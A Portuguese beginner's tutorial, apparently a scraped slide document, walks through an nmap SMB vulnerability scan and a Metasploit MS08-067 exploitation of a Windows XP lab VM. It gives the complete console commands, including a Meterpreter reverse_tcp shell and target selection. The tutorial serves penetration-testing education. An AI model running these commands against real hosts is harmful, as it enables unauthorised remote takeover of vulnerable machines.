+ All Categories
Home > Documents > tutorial backtrack4 simples

tutorial backtrack4 simples

Date post: 08-Apr-2018
Category:
Upload: ramon-ito
View: 219 times
Download: 0 times
Share this document with a friend
6
O cenário utilizado foi o seguinte: Neste caso, são 2 máquinas virtuais (VMs) criadas usando o Virtualbox. As placas de rede de ambas VMs, estão configuradas como bridge. 1ª VM = Sistema Operacional Backtrack 4 Final com endereço IP 192.168.0.170.  2ª VM = Sistema Operacional Windows XP SP2 com endereço IP 192.168.0.186.  Quer saber mais sobre virtualbox? Digite "virtualbox" no google que encontrará ótimos artigos/dicas sobre o mesmo. Scanning com Nmap e Metasploit  Ok pessoal, vamos utilizar a ferramenta "nmap" para fazer o scanning em nossa rede interna. Abra um terminal no micro com o backtrack e digite a seguinte sintaxe: # nmap -v -sS --script=smb-check-vulns 192.168.0.0/24  -v = Modo Verbose -sS = TCP SynScan --script=smb-check-vulns = Script para verificar vulns conhecidas, como por exemplo, MS08-067, Conficker, regsvcDoS e SMBv2 exploit. 192.168.0.0/24= Range de IP utilizado em minha rede local.
Transcript
Page 1: tutorial backtrack4 simples

8/7/2019 tutorial backtrack4 simples

http://slidepdf.com/reader/full/tutorial-backtrack4-simples 1/6

O cenário utilizado foi o seguinte:

Neste caso, são 2 máquinas virtuais (VMs) criadas usando o Virtualbox. As placas de rede de ambas VMs,

estão configuradas como bridge.

1ª VM = Sistema Operacional Backtrack 4 Final com endereço IP 192.168.0.170. 

2ª VM = Sistema Operacional Windows XP SP2 com endereço IP 192.168.0.186. 

Quer saber mais sobre virtualbox? Digite "virtualbox" no google que encontrará ótimos artigos/dicas sobre

o mesmo.

Scanning com Nmap e Metasploit 

Ok pessoal, vamos utilizar a ferramenta "nmap" para fazer o scanning em nossa rede interna.

Abra um terminal no micro com o backtrack e digite a seguinte sintaxe:

# nmap -v -sS --script=smb-check-vulns 192.168.0.0/24 

-v = Modo Verbose

-sS = TCP SynScan

--script=smb-check-vulns = Script para verificar vulns conhecidas, como por exemplo, MS08-067,

Conficker, regsvcDoS e SMBv2 exploit.

192.168.0.0/24= Range de IP utilizado em minha rede local.

Page 2: tutorial backtrack4 simples

8/7/2019 tutorial backtrack4 simples

http://slidepdf.com/reader/full/tutorial-backtrack4-simples 2/6

Se repararem, no host com endereço IP 192.168.0.186, verá que é mostrado as portas que estão abertas, e

em MS08-067 está como VULNERABLE, tendo essa "simples" base, vamos atacá-lo.

Certo, descobrimos um host dentro da nossa LAN que está possívelmente vulnerável ao nosso ataque

pretendido!

Agora vamos carregar o Metasploit. No terminal, basta digitar msfconsole e...

Obtemos nosso console do msf. Dei uma personalizada na saída :-)

Feito isto, vamos efetuar a intrusão na máquina.

Os comando são os seguintes:

use exploit/windows/smb/ms08_067_netapi<------ Aqui falamos que queremos usar o exploit

ms08_067_netapi set RHOST 192.168.0.186<------ Aqui setamos o nosso host remoto, que no caso é o endereço IP da VM

com Windows XP SP2

set PAYLOAD windows/meterpreter/reverse_tcp<------ Aqui especificamos o payload que iremos

utilizar, reverse_tcp, ele é o responsável por criar a nossa comunicação entre LHOST e RHOST. 

set LHOST 192.168.0.170<------ Aqui setamos nosso host local, que no caso é o endereço IP da VM

com Backtrack 4.

exploit <------ E finalmente executamos nosso exploit. Observem a imagem abaixo.

Page 3: tutorial backtrack4 simples

8/7/2019 tutorial backtrack4 simples

http://slidepdf.com/reader/full/tutorial-backtrack4-simples 3/6

 

Pronto! Ganhamos nossa shellmeterpreter, ou seja, já estamos na máquina alvo. Experimente dar os

comandos sysinfo e ipconfig.

Ok! Vamos ver outros recursos que podemos utilizar antes de executarmos o exploit.

Opções Metasploit 

Quando executamos o comando exploit, será realizado um "fingerprint" para a detecção do Sistema

Operacional e verificar se o mesmo consta em sua lista de SOs vulneráveis.

Como vimos atráves do script do nmap que nosso alvo é vulnerável, podemos "nós" realizar o processo de

fingerprint e passar as especificações corretas para o msf, assim nosso exploit não precisará realizar estaetapa, gerando possibilidades menores de erros.

Certo, mais como? Poderiamos fazer utilizando o nmap, mais vamos utilizar um módulo auxiliar presente

no metasploit para descobrir a versão do SO, o idioma, nome da máquina e o domínio. 

Executaremos os seguintes comandos:

Page 4: tutorial backtrack4 simples

8/7/2019 tutorial backtrack4 simples

http://slidepdf.com/reader/full/tutorial-backtrack4-simples 4/6

use auxiliary/scanner/smb/smb_version<---- Falamos que queremos utilizar o scanner

smb_version.

set RHOSTS 192.168.0.186 <---- Aqui eu setei um único host (192.168.0.186), mais poderia especificar

um range, exemplo, 192.168.0.0/24.

run <---- Comando para executar nosso scanner.

Agora já sabemos a versão certa do SO e o idioma, com isso especificaremos em nosso exploit usando a

opção set TARGET.

use exploit/windows/smb/ms08_067_netapi<------ Aqui falamos que queremos usar o exploit

ms08_067_netapi

set RHOST 192.168.0.186<------ Aqui setamos o nosso host remoto, que no caso é o endereço IP da VM

com Windows XP SP2

set PAYLOAD windows/meterpreter/reverse_tcp<------ Aqui especificamos o payload que iremos

utilizar, reverse_tcp, ele é o responsável por criar a nossa comunicação entre LHOST e RHOST. 

set LHOST 192.168.0.170<------ Aqui setamos nosso host local, que no caso é o endereço IP da VM

com Backtrack 4.

set TARGET 31 <------ Aqui eu digo o que o alvo está usando.

exploit <------ E finalmente executamos nosso exploit. Na imagem abaixo, é listado com o comando show 

targets, todos os S.O.s vulneráveis a este exploit (ms08_067).

Page 5: tutorial backtrack4 simples

8/7/2019 tutorial backtrack4 simples

http://slidepdf.com/reader/full/tutorial-backtrack4-simples 5/6

 

Veja abaixo que irei utilizar a opção 31.

Veja o ataque agora.

Veja que não foi realizado a etapa de fingerprint com o alvo, pois "falamos" para o exploit, o S.O. que ele

encontrará em seu destino.

Ok! Finish! The end! Heheheh

Page 6: tutorial backtrack4 simples

8/7/2019 tutorial backtrack4 simples

http://slidepdf.com/reader/full/tutorial-backtrack4-simples 6/6

 

Ah!

É isso galera, intrusão simples, sendo recomendado para quem ainda está começando com o Metasploit. 

Como continuação, poderão seguir o outro artigo que escrevi sobre o Metasploit. 

MetasploitExploitation 

http://codesec.blogspot.com/2010/02/metasploit-exploitation.html  

Abraços a todos!


Recommended